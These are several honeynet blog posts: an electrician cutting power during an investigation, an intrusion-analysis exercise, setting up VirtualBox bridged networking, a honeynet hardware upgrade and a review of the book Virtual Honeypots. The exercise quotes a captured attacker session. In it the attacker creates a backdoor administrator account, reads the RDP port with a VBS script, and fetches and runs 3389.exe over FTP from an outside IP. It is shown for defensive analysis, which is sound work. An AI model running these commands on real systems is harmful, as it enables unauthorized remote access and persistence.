My arch-nemesis

Over the weekend my honeynet got pwned. I mean that in every sense of the word. I'm looking at a 50% rate of compromise. I contained the honeynet and planned on dealing with it this morning. While performing some live response on what I'd targeted as patient-0 my screen went black and my room suddenly got quiet. My office usually hums at about 70DB so when my poweredge server, firewall, precision workstation, switches, kvm, mac mini, 2 workstations AND MY HONEYNET go quiet it's pretty noticeable. I had been in the process of collecting physical memory and...poof.

At first I thought I had popped the breaker. Let's face it I have quite a bit plugged in. Then my thought process started up again...wait I've never popped the breaker..why all of a sudden?

There was a bit of shouting and people started running down the hall to see if I'd broken something..kind of funny. I then remembered something..electricians had been sighted early in the day. My subordinate confirmed this.

"I just saw someone run from that office in to the other room" he said pointing further down the hall.



I walked to the next office and poked my head in..

ME: "Hey are the electricians screwing with stuff?"

COWORKER: "They shouldn't be".

ME: "Well my office just went dark, where are they?"

COWORKER: "Oh, they're next door, let's go talk to them"

ME: "Probably a good idea".

We both poke our heads in to the next room and I spot a power whip laying in the middle of the floor as if to mock me and display the prowess of the master electrician and 3 guys looking at prints. On the wall I spot an open single gang box with wires mashed in a wire nut. That wall is the exact wall where I get power...

ME: "Are you guys messing with power in here?"

ELECTRICIAN: "We saw a few extra wires attached to that whip and had to disconnect it" he says looking at me sheepishly.

...silence...
...silence...
...silence..

ME: "You just took down my office".

ELECTRICIAN: "Yeah sorry about that, that's my bad. I had to disconnect the leads on that whip".

I was lost for words. My arch-nemesis killed all reasonable hope of me collecting information. The vm on bootup gave me some corrupted filesystem errors and the other virtual machines I had running had obviously lost power as well.

Why is the electrician my arch-nemesis you ask? Let's just say this isn't the first time they've struck.

Analyze this

Some time ago I shared an intrusion analysis where the attack vector was the DNSRPC vulnerability. I've decided the trim this one down a bit to let you the reader tell me what you think is happening here.

You receive the following IDS alert on your cell phone early in the morning:

[**] [1:2123:3] ATTACK-RESPONSES Microsoft cmd.exe banner [**]
[Classification: Successful Administrator Privilege Gain] [Priority: 1]
01/20-07:46:11.052115 10.23.62.102:1100 -> 209.112.3.231:2518
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:141
***AP*** Seq: 0xC475E121 Ack: 0xC0B32DBF Win: 0x440B TcpLen: 20
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

After searching your network logs you discover the following:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.23.62.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.23.62.1
C:\WINDOWS\system32>net user tsinternetuser 112233!@#k. /add
The command completed successfully.
C:\WINDOWS\system32>net user tsinternetuser 112233!@#k.
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators tsinternetuser /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>echo Dim ReadComputerName >>3389port.vbs
C:\WINDOWS\system32>echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>3389port.vbs
C:\WINDOWS\system32>echo Dim TSName,TSRegPath >>3389port.vbs
C:\WINDOWS\system32>echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" >>3389port.vbs
C:\WINDOWS\system32>echo TSName=ReadComputerName.RegRead(TSRegPath) >>3389port.vbs
C:\WINDOWS\system32>echo WScript.Echo(TSName) >>3389port.vbs
C:\WINDOWS\system32>cscript 3389port.vbs
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
3389
C:\WINDOWS\system32>del 3389port.vbs
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.23.62.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.23.62.1
C:\WINDOWS\system32>query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator console 0 Active . 1/14/2008 9:08 AM
C:\WINDOWS\system32>echo open 116.2.149.117>>100.txt
C:\WINDOWS\system32>echo 123>>100.txt
C:\WINDOWS\system32>echo 123>>100.txt
C:\WINDOWS\system32>echo bin>>100.txt
C:\WINDOWS\system32>echo get 3389.exe>>100.txt
C:\WINDOWS\system32>echo bye>>100.txt
C:\WINDOWS\system32>ftp -s:100.txt
User (116.2.149.117:(none)): open 116.2.149.117
get 3389.exe
C:\WINDOWS\system32>del 100.txt
C:\WINDOWS\system32>3389 2289
Now opening terminate service...success!
OK...
C:\WINDOWS\system32>


Some questions:

Is the snort alert an indicator or a warning? Explain your reasoning.
Given the clues, how would you begin your investigation?
What do you think the attacker was trying to do?
What does 3389.vbs do?
What do you think 3389.exe does? (If you'd like a copy of it, email me)

Moving to VirtualBox

Just this past week I started migrating my honeynet to VirtualBox after struggling with some performance issues using VMWare workstation 6. My honeynet is currently housing around 20 virtual machines running on an Ubuntu 7.10 x64 Server distribution.

VirtualBox has a pretty solid set of documentation available and they build for Ubuntu and a few other distributions so installation is pretty easy.

I added the following to my sources.list:

deb http://www.virtualbox.org/debian gutsy non-free

First I wanted to see what packages were available.

hogfly@maluminse:~$ sudo apt-cache search virtualbox

virtualbox-ose - PC virtualization solution
virtualbox-ose-modules-2.6.22-14-generic - virtualbox-ose modules for linux-image-2.6.22-14-generic
virtualbox-ose-modules-2.6.22-14-server - virtualbox-ose modules for linux-image-2.6.22-14-server
virtualbox-ose-source - Source for the VirtualBox module
virtualbox - innotek VirtualBox


Ok..so speaking from hindsight, don't install the -ose packages. You'll end up being short some VBox commands that came in to play for me (VBoxAddIF for instance).

Install was as simple as issuing the apt-get install virtualbox command.

Once installed I created a Windows XP virtual machine and initially left it configured to use NAT. Eventually I moved this to a Bridged interface setup giving the virtual machine direct network access.

To accomplish this I installed bridge-utils and set up a bridge.

hogfly@maluminse:~$ sudo brctl addbr vboxbr0
hogfly@maluminse:~$ sudo brctl addif vboxbr0 eth2

To add the virtual machine to the bridge I first needed to create the virtual host interface.

hogfly@maluminse:~$ sudo VBoxAddIF vbox0 hogfly vboxbr0

VirtualBox host networking interface creation utility, version 1.5.4
(C) 2005-2007 innotek GmbH
All rights reserved.

Creating the permanent host networking interface "vbox0" for user hogfly.


Now that I had the virtual host interface set up I simply added it to the bridge.

hogfly@maluminse:~$ sudo brctl addif vboxbr0 vbox0

After doing this I just gave the XP system an IP address, installed some software, shut it down and started cloning it.

Cloning a VM in VirtualBox is pretty easy. The command line utility is called VBoxManage. I've found this to be far superior to Vmware's vmrun command line utility.

To clone my XP base image I simply issued the following command:

VBoxManage clonevdi XPBASE.vdi /mnt/honeypots/vbox1/Hpot1.vdi After a few minutes, the disk image was copied and I was ready to do some configuration. First though I had to "create" the virtual machine. This is basically just a registration of the VM existence.

To do so I issued the following command:
hogfly@maluminse:~$ VBoxManage createvm -name gumby -register -basefolder /mnt/honeypots/vbox1/
VirtualBox Command Line Management Interface Version 1.5.4
(C) 2005-2007 innotek GmbH
All rights reserved.

Virtual machine 'gumby' is created and registered.
UUID: cd07351b-8428-4829-62b0-1e42d86dd5d9
Settings file: '/mnt/honeypots/vbox1/gumby/gumby.xml'


Now I can start it up if I so choose:

hogfly@maluminse:~$ VBoxManage startvm gumby


So far I'm happy with VirtualBox but we'll see how things progress.

Honeynet Upgrade

I recently got a little funding for my honeynet and bought some new hardware for it. The major additions was some 3ware equipment, new processor and motherboard and lots of hard drives. I put 8 500GB sata II seagate ES drives in the box and a 3ware 9650SE as the raid controller. I finally made the move to vmware as my honeynet platform - expanding the honeynet from 5 to 20 machines. I'm currently building up a new website for it and adding some services to be exploited. I also moved away from the the honeynet project's roo cdrom - it just wasn't cutting it anymore. Snort 2.3 is way too outdated.

I re-used my old honeywall hardware and loaded fedora core 8 on the box and I loaded snort and snort running in inline mode, argus, tcpdump, swatch, sebek-server and some other goodies. The iptables configuration was created using fwbuilder.

So ultimately the honeynet is now a hybrid with a physical box for the honeywall and vmware based honeypots. I'm somewhat excited and hopeful that people will attack it, but I guess time will tell.

I'd like to add some automation to the activities on the honeypots using autohotkey or autoit and robotask.


I was pretty shocked to find that one of my hosts was almost immediately getting dinged with sasser.b - yeah I said sasser. I'm also getting some potshots taken at the nepenthes collector. Just yesterday I picked up a binary named msnnmaneger.exe (an sdbot variant).

Review - Virtual Honeypots

I got this book approximately 3 days ago and absolutely tore through it. This book was fantastic in every sense of the word.

Niels Provos (of honeyd fame) and Thorsten Holz (from the German honeynet project) teamed up to provide a true wealth of knowledge and information in Virtual Honeypots *note I bought it from Amazon*

As the title suggests, this book is all about creating and utilizing a virtualized environment to host honeypots. From the first chapter on, there is no mincing of words and the technical aspects are covered from set up to configuration to usage. Virtual Honeypots is a logical progression from the initial honeypots and KYE books and focuses more on the honeypot than the honeynet. There's such a wide variety of topics discussed that this book is probably best served as a reference after reading it once or twice. I was in awe when I read chapter 7 and specifically the section on the potemkin honeyfarm which apparently has been used to emulate over 64,000 honeypots!

This book presents itself really well and the authors did a fantastic job covering all of the critical and really interesting projects that are out there in the honey(net|pot) world. If you operate a honeynet or honeypots this book is not an option, it simply provides too much information to ignore. Even if you don't operate a honey(net|pot) this book is well worth the money and It's going right on the shelf next to other quick grab reference books.